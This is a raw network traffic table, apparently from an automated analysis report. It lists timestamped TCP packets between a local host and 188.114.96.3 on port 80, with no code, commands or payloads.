                                                        Oct 30, 2024 05:25:05.226632118 CET8050216188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:05.278903008 CET5021680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:05.352535009 CET5021680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:05.352539062 CET5021780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:05.357938051 CET8050217188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:05.358154058 CET5021780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:05.358154058 CET5021780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:05.358241081 CET8050216188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:05.359385967 CET5021680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:05.363534927 CET8050217188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:05.715126991 CET5021780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:05.720518112 CET8050217188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:05.956223965 CET8050217188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:06.034022093 CET5021780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:06.163146019 CET8050217188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:06.289697886 CET5021780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:06.290913105 CET5021880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:06.295538902 CET8050217188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:06.295589924 CET5021780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:06.296221018 CET8050218188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:06.296288013 CET5021880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:06.296394110 CET5021880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:06.301670074 CET8050218188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:06.652556896 CET5021880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:06.657970905 CET8050218188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:06.903122902 CET8050218188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.100133896 CET5021880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.241166115 CET8050218188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.241220951 CET8050218188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.241394997 CET5021880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.365750074 CET5021880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.365755081 CET5021980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.371130943 CET8050219188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.371579885 CET5021980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.371579885 CET5021980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.372061968 CET8050218188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.372126102 CET5021880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.377520084 CET8050219188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.388254881 CET5021980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.388261080 CET5022080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.393841028 CET8050220188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.394109964 CET5022080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.394165993 CET5022080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.399645090 CET8050220188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.438962936 CET8050219188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.511353970 CET5022180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.516765118 CET8050221188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.519076109 CET5022180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.519213915 CET5022180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.524604082 CET8050221188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.746364117 CET5022080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.751842022 CET8050220188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.751858950 CET8050220188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.867842913 CET8050219188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:07.871125937 CET5021980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.874979973 CET5022180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:07.880510092 CET8050221188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:08.023168087 CET8050220188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:08.105611086 CET5022080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:08.108381987 CET8050221188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:08.152446032 CET5022180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:08.234321117 CET8050220188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:08.341586113 CET5022080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:08.424251080 CET8050221188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:08.464946985 CET5022180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:08.540456057 CET5022080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:08.540462017 CET5022180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:08.541507959 CET5022280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:08.546097994 CET8050221188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:08.546211004 CET5022180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:08.546403885 CET8050220188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:08.546451092 CET5022080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:08.546760082 CET8050222188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:08.546825886 CET5022280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:08.546979904 CET5022280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:08.552294970 CET8050222188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:08.902739048 CET5022280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:08.908196926 CET8050222188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:09.143377066 CET8050222188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:09.199372053 CET5022280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:09.346910954 CET8050222188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:09.346925974 CET8050222188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:09.347042084 CET5022280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:09.460946083 CET5022380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:09.471379995 CET8050223188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:09.473206043 CET5022380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:09.473402023 CET5022380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:09.478705883 CET8050223188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:09.824475050 CET5022380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:09.829818964 CET8050223188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:10.068726063 CET8050223188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:10.203576088 CET5022380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:10.376962900 CET8050223188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:10.376976013 CET8050223188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:10.377022982 CET5022380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:10.494043112 CET5022380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:10.495017052 CET5022480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:10.499706984 CET8050223188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:10.499758005 CET5022380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:10.500389099 CET8050224188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:10.500448942 CET5022480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:10.500556946 CET5022480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:10.505776882 CET8050224188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:10.855688095 CET5022480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:10.861411095 CET8050224188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:11.095467091 CET8050224188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:11.308759928 CET5022480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:11.312810898 CET8050224188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:11.312901020 CET5022480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:11.402879953 CET8050224188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:11.496926069 CET5022480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:11.520934105 CET5022280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:11.523185968 CET5022480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:11.524921894 CET5022580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:11.530554056 CET8050224188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:11.531945944 CET8050225188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:11.532991886 CET5022580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:11.532994032 CET5022480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:11.533140898 CET5022580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:11.540316105 CET8050225188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:11.886950970 CET5022580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:11.892288923 CET8050225188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:12.131067038 CET8050225188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:12.183706045 CET5022580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:12.338345051 CET8050225188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:12.386845112 CET5022580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:12.462207079 CET5022580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:12.463210106 CET5022680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:12.468074083 CET8050225188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:12.468142033 CET5022580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:12.468535900 CET8050226188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:12.468617916 CET5022680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:12.468717098 CET5022680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:12.474003077 CET8050226188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:12.824415922 CET5022680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:12.829740047 CET8050226188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:13.066756964 CET8050226188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:13.123370886 CET5022680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:13.247096062 CET5022680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:13.251363039 CET5022780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:13.252633095 CET8050226188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:13.255098104 CET5022680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:13.256803989 CET8050227188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:13.259236097 CET5022780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:13.259236097 CET5022780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:13.264631987 CET8050227188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:13.366044998 CET5022880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:13.371468067 CET8050228188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:13.371954918 CET5022880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:13.371954918 CET5022880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:13.377285957 CET8050228188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:13.607079029 CET5022780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:13.612445116 CET8050227188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:13.612546921 CET8050227188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:13.731179953 CET5022880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:13.736507893 CET8050228188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:13.970204115 CET8050227188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:13.982517958 CET8050228188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:14.027709007 CET5022880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:14.070107937 CET8050227188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:14.070159912 CET5022780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:14.210289955 CET8050228188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:14.261835098 CET5022880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:14.337397099 CET5022780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:14.337404013 CET5022880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:14.338474035 CET5022980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:14.344000101 CET8050227188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:14.344018936 CET8050228188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:14.344042063 CET5022780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:14.344064951 CET5022880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:14.344069004 CET8050229188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:14.344125986 CET5022980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:14.344330072 CET5022980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:14.349606037 CET8050229188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:14.699501038 CET5022980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:14.708110094 CET8050229188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:14.945291042 CET8050229188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:14.996264935 CET5022980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:15.152044058 CET8050229188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:15.274981976 CET5023080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:15.280282974 CET8050230188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:15.283494949 CET5023080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:15.283494949 CET5023080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:15.289350986 CET8050230188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:15.295042038 CET5022980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:15.639359951 CET5023080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:15.644781113 CET8050230188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:15.884659052 CET8050230188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:16.020606995 CET5023080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:16.204624891 CET8050230188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:16.204766035 CET8050230188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:16.204818964 CET5023080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:16.319060087 CET5023080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:16.319976091 CET5023180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:16.324799061 CET8050230188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:16.324852943 CET5023080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:16.325308084 CET8050231188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:16.325371027 CET5023180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:16.325469017 CET5023180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:16.330713987 CET8050231188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:16.683872938 CET5023180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:16.689344883 CET8050231188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:16.932919979 CET8050231188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:16.980616093 CET5023180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:17.136276007 CET8050231188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:17.187181950 CET5023180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:17.261743069 CET5023180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:17.261758089 CET5023280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:17.267194033 CET8050232188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:17.267617941 CET8050231188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:17.267807961 CET5023180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:17.267817974 CET5023280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:17.268035889 CET5023280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:17.273374081 CET8050232188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:17.623383045 CET5023280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:17.628906012 CET8050232188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:18.792450905 CET8050232188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:18.793471098 CET8050232188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:18.793538094 CET5023280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:18.794126987 CET8050232188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:18.794187069 CET5023280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:18.794403076 CET8050232188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:18.794447899 CET5023280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:18.799161911 CET8050232188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:18.799206018 CET5023280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:18.920620918 CET5023280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:18.922188044 CET5023380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:18.928505898 CET8050232188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:18.928560019 CET5023280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:18.929902077 CET8050233188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:18.929959059 CET5023380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:18.930100918 CET5023380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:18.933855057 CET5022980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:18.937643051 CET8050233188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:19.075910091 CET5023380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:19.076946020 CET5023480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:19.082340956 CET8050234188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:19.085259914 CET5023480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:19.088947058 CET5023480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:19.094291925 CET8050234188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:19.127044916 CET8050233188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:19.196995974 CET5023580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:19.202461958 CET8050235188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:19.205111027 CET5023580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:19.205111027 CET5023580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:19.210489035 CET8050235188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:19.409813881 CET8050233188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:19.413311005 CET5023380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:19.433839083 CET5023480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:19.439261913 CET8050234188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:19.439419985 CET8050234188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:19.559039116 CET5023580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:19.564454079 CET8050235188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:19.684113026 CET8050234188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:19.730696917 CET5023480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:19.798065901 CET8050235188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:19.902532101 CET5023580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:19.988022089 CET8050234188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:20.004278898 CET8050235188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:20.043122053 CET5023480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:20.119285107 CET5023480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:20.119522095 CET5023580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:20.120362997 CET5023680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:20.125263929 CET8050234188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:20.125322104 CET5023480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:20.125677109 CET8050235188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:20.125690937 CET8050236188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:20.125720024 CET5023580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:20.128950119 CET5023680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:20.128950119 CET5023680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:20.134227037 CET8050236188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:20.480711937 CET5023680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:20.486162901 CET8050236188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:20.725500107 CET8050236188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:20.777486086 CET5023680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:20.921139956 CET8050236188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:20.965007067 CET5023680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:21.037827969 CET5023780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:21.043227911 CET8050237188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:21.045116901 CET5023780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:21.045252085 CET5023780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:21.050520897 CET8050237188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:21.404953957 CET5023780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:21.410283089 CET8050237188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:21.662934065 CET8050237188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:21.793179989 CET5023780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:21.875559092 CET8050237188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:21.989331961 CET5023680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:21.993798971 CET5023780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:21.994231939 CET5023880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:21.999567032 CET8050238188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:21.999726057 CET8050237188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:21.999756098 CET5023880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:22.004630089 CET5023780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:22.005348921 CET5023880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:22.010607958 CET8050238188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:22.355834007 CET5023880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:22.361387968 CET8050238188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:22.598146915 CET8050238188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:22.648536921 CET5023880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:22.815367937 CET8050238188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:22.867831945 CET5023880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:22.932610035 CET5023880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:22.933758974 CET5023980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:22.938297033 CET8050238188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:22.938344002 CET5023880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:22.939045906 CET8050239188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:22.939109087 CET5023980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:22.939183950 CET5023980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:22.944441080 CET8050239188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:23.293262005 CET5023980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:23.298827887 CET8050239188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:23.534601927 CET8050239188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:23.592952967 CET5023980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:23.737787008 CET8050239188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:23.793176889 CET5023980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:23.851135969 CET5023980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:23.851135969 CET5024080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:23.856566906 CET8050240188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:23.857017040 CET8050239188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:23.857050896 CET5024080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:23.860965014 CET5024080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:23.864963055 CET5023980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:23.866415977 CET8050240188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:24.215445995 CET5024080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:24.220799923 CET8050240188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:24.462804079 CET8050240188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:24.511876106 CET5024080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:24.679821014 CET8050240188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:24.679833889 CET8050240188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:24.679887056 CET5024080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:24.806214094 CET5024080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:24.806826115 CET5024180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:24.812102079 CET8050240188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:24.812177896 CET5024080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:24.812252998 CET8050241188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:24.812321901 CET5024180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:24.812473059 CET5024180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:24.817751884 CET8050241188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:24.999062061 CET5024280192.168.2.4188.114.96.3
